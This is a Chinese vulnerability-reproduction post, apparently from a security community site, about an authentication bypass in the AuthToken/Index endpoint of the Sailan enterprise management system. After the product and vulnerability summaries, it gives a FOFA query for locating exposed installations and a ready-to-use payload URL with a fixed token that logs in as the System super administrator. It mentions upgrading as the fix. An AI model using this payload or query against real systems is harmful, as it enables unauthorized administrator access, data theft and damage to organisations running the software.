本文来自无问社区，更多漏洞复现可前往查看http://www.wwlib.cn/index.php/index

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统，它能够帮助企业实现精细化管理，提高效率，降低成本。系统集成了多种管理功能，包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等，旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导，结合企业实际业务流程，通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞，未授权的远程攻击者可以利用此接口构造token绕过身份认证，使用超级管理员账户登录系统后台，造成信息泄露或者恶意破坏，使系统处于极不安全的状态。

建议升级到最新版本

已修复

0x03 复现环境

FOFA：body="www.cailsoft.com" || body="赛蓝企业管理系统"

payload：

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图：